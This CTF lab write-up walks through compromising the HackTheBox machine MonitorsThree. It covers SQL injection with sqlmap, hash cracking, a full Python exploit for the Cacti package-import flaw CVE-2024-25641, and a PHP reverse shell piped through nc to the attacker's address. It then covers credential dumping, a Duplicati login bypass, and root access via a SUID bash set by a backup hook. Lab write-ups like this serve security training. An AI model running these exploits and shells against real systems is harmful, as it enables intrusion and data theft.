HackTheBox MonitorsThree Writeup

Explore the fundamentals of cybersecurity in the MonitorsThree Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.11.30 cacti.monitorsthree.htb monitorsthree.htb

Script to add hosts automatically

ip="10.10.11.30"
domain="cacti.monitorsthree.htb monitorsthree.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV monitorsthree.htb

Nmap scan report for monitorsthree.htb (10.10.11.30)
Host is up (0.052s latency).
Other addresses for monitorsthree.htb (not scanned): 10.10.11.30
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 86:f8:7d:6f:42:91:bb:89:72:91:af:72:f3:01:ff:5b (ECDSA)
|_  256 50:f9:ed:8e:73:64:9e:aa:f6:08:95:14:f0:a6:0d:57 (ED25519)
80/tcp   open     http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: MonitorsThree - Networking Solutions
8084/tcp filtered websnp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SQL Injection

Target URL:

http://monitorsthree.htb/login.php

• The page is dynamic (.php) and can be tested for SQL injection vulnerabilities.

Testing SQL Injection on Forgot Password Page:

Target URL: http://monitorsthree.htb/forgot_password.php

• Testing payload: sending ''' triggers an SQL error.
• Save the request via Burp as sql.req.
• Modify the request to POST http://monitorsthree.htb/forgot_password.php.

sqlmap -r "$(pwd)/sql.req" -dbs --answers="location=N" --batch -p "username" --risk 3

• The injection was successful, revealing the following information:

---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=' AND (SELECT 9213 FROM (SELECT(SLEEP(5)))ErVh) AND 'Nepa'='Nepa
---
Available databases [2]:
[*] information_schema
[*] monitorsthree_db

sqlmap -r "$(pwd)/sql.req" -D monitorsthree_db --tables --answers="location=N" --batch
sqlmap -r "$(pwd)/sql.req" -D monitorsthree_db -T users --dump --answers="location=N" --batch

Brute Force the Hash

Use an hash cracking tool like hashcat or John the Ripper to perform a brute force attack on the password hash, or use a service such as crackstation for this purpose.

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 0 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 0 /tmp/hash.txt --show
rm -rf /tmp/hash.txt

After logging in, if nothing is found, try using Gobuster for virtual host enumeration:

gobuster vhost -u http://monitorsthree.htb --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -r

CVE-2024-25641

nano rce

#!/bin/env python3
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives import hashes
import os, requests, base64, gzip
from bs4 import BeautifulSoup
import random, string
import argparse
import signal
import sys
def signal_handler(sig, frame):
    print("\nCtrl + C detected, exiting...")
    sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
print('''\nPOC CVE-2024-25641\n\n''')
parser = argparse.ArgumentParser(
    epilog='''Examples:
            ./exploit.py http://localhost/cacti admin password
            ./exploit.py -p './php/rev.php' http://localhost/cacti admin password''',
    formatter_class=argparse.RawTextHelpFormatter
    )
parser.add_argument('URL',type=str,help='The target Cacti URL')
parser.add_argument('username',type=str,help='Login username')
parser.add_argument('password',type=str,help='Login password')
parser.add_argument('-p','--payload',type=str,help='Path to the PHP payload file (default: `rev.php` is a reverse shell created by pentestmonkey, Don\'t forget to change the ip & port)',default='./rev.php')
args = parser.parse_args()
URL = args.URL
username = args.username
password = args.password
filename = args.payload
print('[*] Login attempts...')
login_path = '/index.php'
s = requests.Session()
r = s.get(URL)
soup = BeautifulSoup(r.text, 'html.parser')
html_parser = soup.find('input',{'name':'__csrf_magic'})
csrf = html_parser.get('value')
data = {
    '__csrf_magic': csrf,
    'action': 'login',
    'login_username': username,
    'login_password': password,
    'remember_me': 'on'
    }
r = s.post(URL + login_path,data=data)
if 'Logged in' not in r.text:
    print('[Failed]')
    exit(1)
print('[SUCCESS]')
dest_filename = ''.join(random.choices(string.ascii_lowercase, k=16)) + '.php'
print("[*] Creating the gzip...")
xmldata = """<xml>
   <files>
       <file>
           <name>resource/{}</name>
           <data>{}</data>
           <filesignature>{}</filesignature>
       </file>
   </files>
   <publickey>{}</publickey>
   <signature></signature>
</xml>"""
with open(filename) as data:
    filedata = data.read()
keypair = rsa.generate_private_key(
    public_exponent=65537,
    key_size=2048,
)
public_key = keypair.public_key().public_bytes(
    encoding=serialization.Encoding.PEM,
    format=serialization.PublicFormat.SubjectPublicKeyInfo
)
filesignature = keypair.sign(
    filedata.encode('utf-8'),
    padding.PKCS1v15(),
    hashes.SHA256()
)
data = xmldata.format(
    dest_filename,
    base64.b64encode(filedata.encode('utf-8')).decode('utf-8'),
    base64.b64encode(filesignature).decode('utf-8'),
    base64.b64encode(public_key).decode('utf-8')
)
signature = keypair.sign(
    data.encode('utf-8'),
    padding.PKCS1v15(),
    hashes.SHA256()
)
final_data = data.replace("<signature></signature>", f"<signature>{base64.b64encode(signature).decode('utf-8')}</signature>")
final_data = final_data.encode('utf-8')
gz_filename = f'{dest_filename}.gz'
with open(gz_filename,'wb') as poc:
    poc.write(gzip.compress(final_data))
print('[SUCCESS]')
print('GZIP path is',os.getcwd() + '/' + gz_filename)
print('[*] Sending payload...')
import_post1 = '/package_import.php?package_location=0&preview_only=on&remove_orphans=on&replace_svalues=on'
files = {'import_file': open(gz_filename,'rb')}
data = {
    '__csrf_magic': csrf,
    'trust_signer': 'on',
    'save_component_import': 1,
    'action': 'save'
    }
r = s.post(URL + import_post1, data=data, files=files)
import_post2 = '/package_import.php?header=false'
soup = BeautifulSoup(r.text,'html.parser')
html_parser = soup.find('input',{'title':f'/var/www/html/cacti/resource/{dest_filename}'})
file_id = html_parser.get('id')
data = {
    '__csrf_magic': csrf,
    'trust_signer':'on',
    'data_source_profile':1,
    'remove_orphans':'on',
    'replace_svalues':'on',
    file_id: 'on',
    'save_component_import':1,
    'preview_only': '',
    'action':'save',
}
r = s.post(URL + import_post2, data=data)
print('[SUCCESS]')
file_path = f'/resource/{dest_filename}'
print('You will find the payload in',URL + file_path)
option = input('Do you wanna start the payload ?[Y/n]')
if option.lower() == 'y':
    print('Payload is running...')
    r = s.get(URL + file_path)

listener:

nc -lvnp 9001

upload php revshell:

chmod +x rce
ip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo "<?php shell_exec('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc "$ip" 9001 >/tmp/f'); ?>" > rev.php
./rce http://cacti.monitorsthree.htb/cacti admin greencacti2001
rm -rf rev.php

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

export TERM=xterm;

Dump Database

cat /var/www/html/cacti/include/config.php | grep 'database_'
mysql -ucactiuser -pcactiuser

SHOW DATABASES;
USE cacti;
SHOW TABLES;
SELECT * FROM user_auth;

Brute Force the Hash

Use an hash cracking tool like hashcat or John the Ripper to perform a brute force attack on the password hash, or use a service such as crackstation for this purpose.

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 3200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 3200 /tmp/hash.txt --show
rm -rf /tmp/hash.txt

su marcus

cat /home/marcus/user.txt
netstat -tpln

Local 8200

Port 8200 is showing up. Here’s how to forward it without using Chisel, as an alternative method:

On the server, forward traffic with socat:

socat TCP-LISTEN:9898,fork TCP:127.0.0.1:8200 &

Now, port 9898 is open to the public. You can access the service at:

http://monitorsthree.htb:9898/login.html

This will allow external access to port 8200 via port 9898 on the public interface.

Get DB info of Duplicati server as discovered

https://github.com/duplicati/duplicati/issues/5197

strings /opt/duplicati/config/Duplicati-server.sqlite | grep -E 'server-passphrase|server-passphrase-salt' | grep -v 'server-passphrase-t' | sed -E 's/.*server-passphrase-salt//;s/.*server-passphrase//;s/C>$//'
echo 'Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=' | base64 -d | xxd -p -c 256

Log in with a random password and intercept request

Forward the 1st request and select the coockie nonce in the second one and copy the burp uri decoded value

run in the browser f12:

var saltedpwd = '59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a'; 
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('NonceFromBurp') + saltedpwd)).toString(CryptoJS.enc.Base64);
console.log(noncedpwd);

In the 2nd intercepted request change the password with the result of the previous js but ctrl+u “url encode” and forward all.

After disable intercept

Create a New Backup:

• Encryption: Set to none (no encryption).
• Destination: /source/tmp
• Source: /source/root
• Schedule: Disable the option Automatically run backups.

Restore a File:

• Go to the Restore section.
• Select the file root.txt from the backup.
• Restore Destination: /source/home/marcus/
• Enable the option Restore read/write permissions.

Check Restored File:

• Use the following command to view the contents of the restored file:

  cat /home/marcus/root.txt
  

We will create a script that sets the SUID permission on /bin/bash, allowing us to execute bash with root privileges.

echo -e '#!/bin/bash\nchmod u+s /bin/bash' > /tmp/myscript.sh && chmod +x /tmp/myscript.sh

• This script changes the permissions on /bin/bash to give the binary the SUID bit (user can run it with root privileges).
• chmod u+s /bin/bash: The SUID bit will allow the bash shell to be run as the owner (which is root).
• Go to the web interface: <http://monitorsthree.htb:8201/ngax/index.html#/edit/4>
• Edit the existing backup task:
  • Advanced Options: Add the run-script-before option and point it to your script: /source/tmp/myscript.sh.
• After editing the backup task, run the backup. This will execute /tmp/myscript.sh as part of the backup process, setting the SUID bit on /bin/bash.

After the backup runs, check if the SUID bit is set on /bin/bash.

ls -la /bin/bash

You should see something like this:

-r-Srwsrwx 1 root root 1396520 Mar 14  2024 /bin/bash

• The -r-Srwsrwx permissions indicate that the SUID bit is set.

Now, run bash with the -p option to maintain root privileges:

bash -p

This will drop you into a root shell:

bash-5.1# id
uid=1000(marcus) gid=1000(marcus) euid=0(root) egid=0(root) groups=0(root),1000(marcus)

You now have a shell with root privileges (euid=0).

You can now search for passwords in scripts or configuration files that the system uses, such as the Duplicati client.

cat /root/scripts/duplicati-client/duplicati_client.py | grep 'password = "'